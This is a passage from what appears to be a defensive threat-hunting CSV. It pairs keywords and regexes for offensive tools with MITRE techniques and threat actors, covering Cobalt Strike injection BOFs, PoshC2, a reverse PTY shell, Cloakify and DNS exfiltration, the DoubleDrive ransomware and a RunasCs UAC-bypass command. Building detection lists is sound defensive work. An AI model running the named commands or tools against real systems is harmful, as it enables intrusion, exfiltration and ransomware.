T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38336" "*clipboardinject.x64*",".{0,1000}clipboardinject\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38337" "*clipboardinject.x86*",".{0,1000}clipboardinject\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","38338" "*clipboard-monitor *",".{0,1000}clipboard\-monitor\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","38339" "*ClipboardWindow-Inject*",".{0,1000}ClipboardWindow\-Inject.{0,1000}","offensive_tool_keyword","cobaltstrike","CLIPBRDWNDCLASS process injection technique(BOF) - execute beacon shellcode in callback","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BronzeTicket/ClipboardWindow-Inject","1","1","N/A","N/A","10","10","68","12","2022-09-15T01:41:39Z","2022-09-14T15:55:06Z","38340" "*clipmon.sln*",".{0,1000}clipmon\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - 
T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","38341" "*Cliws - Lightweight interactive bind/reverse PTY shell*",".{0,1000}Cliws\s\-\sLightweight\sinteractive\sbind\/reverse\sPTY\sshell.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#content","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","38342" "*cliws -r ws://*",".{0,1000}cliws\s\-r\sws\:\/\/.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","38343" 
"*clndh3qilvdv6403g1n0hs3rhd6xpfmjn.oast.online*",".{0,1000}clndh3qilvdv6403g1n0hs3rhd6xpfmjn\.oast\.online.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","38344" "*cloakify*",".{0,1000}cloakify.{0,1000}","offensive_tool_keyword","cloakify","CloakifyFactory & the Cloakify Toolset - Data Exfiltration & Infiltration In Plain Sight. Evade DLP/MLS Devices. Social Engineering of Analysts. Defeat Data Whitelisting Controls. Evade AV Detection. Text-based steganography using lists. Convert any file type (e.g. executables. Office. Zip. images) into a list of everyday strings. Very simple tools. powerful concept. limited only by your imagination.","T1001 - T1003 - T1027 - T1036 - T1048 - T1052","TA0010","N/A","N/A","Data Exfiltration","https://github.com/TryCatchHCF/Cloakify","1","0","N/A","N/A","N/A","10","1596","233","2020-11-24T05:25:04Z","2016-05-07T04:52:26Z","38345" "*CloakNDaggerC2-main*",".{0,1000}CloakNDaggerC2\-main.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","38346" "*cloc.exe --exclude-dir*",".{0,1000}cloc\.exe\s\-\-exclude\-dir.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","38347" "*closetrap@aol.com*",".{0,1000}closetrap\@aol\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","38348" "*Cloud C2 must be run from the command line*",".{0,1000}Cloud\sC2\smust\sbe\srun\sfrom\sthe\scommand\sline.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#content","N/A","10","9","N/A","N/A","N/A","N/A","38349" "*Cloud C2 will work behind a reverse proxy*",".{0,1000}Cloud\sC2\swill\swork\sbehind\sa\sreverse\sproxy.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","#content","N/A","10","9","N/A","N/A","N/A","N/A","38350" 
"*cloud_drive_ransomware.py*",".{0,1000}cloud_drive_ransomware\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","38352" "*cloud_enum-master.zip*",".{0,1000}cloud_enum\-master\.zip.{0,1000}","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","N/A","6","10","1794","271","2024-10-10T08:16:59Z","2019-05-31T09:14:05Z","38353" "*cloudfail.py --target seo.com --tor*",".{0,1000}cloudfail\.py\s\-\-target\sseo\.com\s\-\-tor.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38354" "*cloudFilterEOP.exe*",".{0,1000}cloudFilterEOP\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38355" "*Cloudflared and Loclx have started successfully!*",".{0,1000}Cloudflared\sand\sLoclx\shave\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","38356" "*Cloudflared has started successfully!*",".{0,1000}Cloudflared\shas\sstarted\ssuccessfully!.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","38357" "*cloudmapper collect --account parent --profile parent*",".{0,1000}cloudmapper\scollect\s\-\-account\sparent\s\-\-profile\sparent.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38371" "*cloudmapper configure add-account --config-file config.json --name parent --id XXX --default true*",".{0,1000}cloudmapper\sconfigure\sadd\-account\s\-\-config\-file\sconfig\.json\s\-\-name\sparent\s\-\-id\sXXX\s\-\-default\strue.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38372" "*cloudmapper configure discover-organization-accounts*",".{0,1000}cloudmapper\sconfigure\sdiscover\-organization\-accounts.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38373" "*cloudsplaining create-multi-account-config-file -o accounts.yml*",".{0,1000}cloudsplaining\screate\-multi\-account\-config\-file\s\-o\saccounts\.yml.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38374" "*cloudsplaining download --profile someprofile*",".{0,1000}cloudsplaining\sdownload\s\-\-profile\ssomeprofile.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38375" "*cloudsplaining scan --input-file default.json*",".{0,1000}cloudsplaining\sscan\s\-\-input\-file\sdefault\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38376" "*cloudsplaining scan-multi-account -c accounts.yml -r TargetRole --output-directory 
./*",".{0,1000}cloudsplaining\sscan\-multi\-account\s\-c\saccounts\.yml\s\-r\sTargetRole\s\-\-output\-directory\s\.\/.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38377" "*cloudsplaining scan-policy-file --input-file examples/policies/wildcards.json*",".{0,1000}cloudsplaining\sscan\-policy\-file\s\-\-input\-file\sexamples\/policies\/wildcards\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38378" "*cloudsploit *",".{0,1000}cloudsploit\s.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","0","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38379" "*cloudsploit*cloudtrail*",".{0,1000}cloudsploit.{0,1000}cloudtrail.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38380" "*cloudsploit/index.js*",".{0,1000}cloudsploit\/index\.js.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38381" "*cloudsploit/scans*",".{0,1000}cloudsploit\/scans.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38382" "*CloudSploitSupplemental*",".{0,1000}CloudSploitSupplemental.{0,1000}","offensive_tool_keyword","cloudsploit","CloudSploit by Aqua is an open-source project designed to allow detection of security risks in cloud infrastructure accounts including: Amazon Web Services (AWS) - Microsoft Azure - Google Cloud Platform (GCP) - Oracle Cloud Infrastructure (OCI) and GitHub. 
These scripts are designed to return a series of potential misconfigurations and security risks.","T1526 - T1534 - T1547 - T1078 - T1046","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/aquasecurity/cloudsploit","1","1","N/A","N/A","N/A","10","3498","702","2025-03-20T12:01:19Z","2015-06-29T15:33:40Z","38383" "*cloudtrail__csv_injection*",".{0,1000}cloudtrail__csv_injection.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","38384" "*clr2of8/DPAT*",".{0,1000}clr2of8\/DPAT.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","1","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","38385" "*clr2of8/GatherContacts*",".{0,1000}clr2of8\/GatherContacts.{0,1000}","offensive_tool_keyword","GatherContacts","A Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.As part of reconnaissance when performing a penetration test. it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. 
One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.","T1593 - T1533 - T1087","TA0043 - TA0002","N/A","N/A","Reconnaissance","https://github.com/clr2of8/GatherContacts","1","1","N/A","N/A","N/A","2","193","44","2024-07-06T09:18:54Z","2018-03-29T14:46:14Z","38386" "*cmars/onionpipe*",".{0,1000}cmars\/onionpipe.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","38388" "*cmbndhnoonmghfofefkcccljbkdpamhi_14678.crx*",".{0,1000}cmbndhnoonmghfofefkcccljbkdpamhi_14678\.crx.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","38389" "*cmd /c * --bypass-uac*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-bypass\-uac.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","38394" "*cmd /c * --remote-impersonation*",".{0,1000}cmd\s\/c\s.{0,1000}\s\-\-remote\-impersonation.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","38395" "*cmd /c *if exist *.txt echo ImHere*",".{0,1000}cmd\s\/c\s.{0,1000}if\sexist\s.{0,1000}\.txt\secho\sImHere.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","38396" "*cmd /c mklink /d * HarddiskVolumeShadowCopy1*",".{0,1000}cmd\s\/c\smklink\s\/d\s.{0,1000}\sHarddiskVolumeShadowCopy1.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for 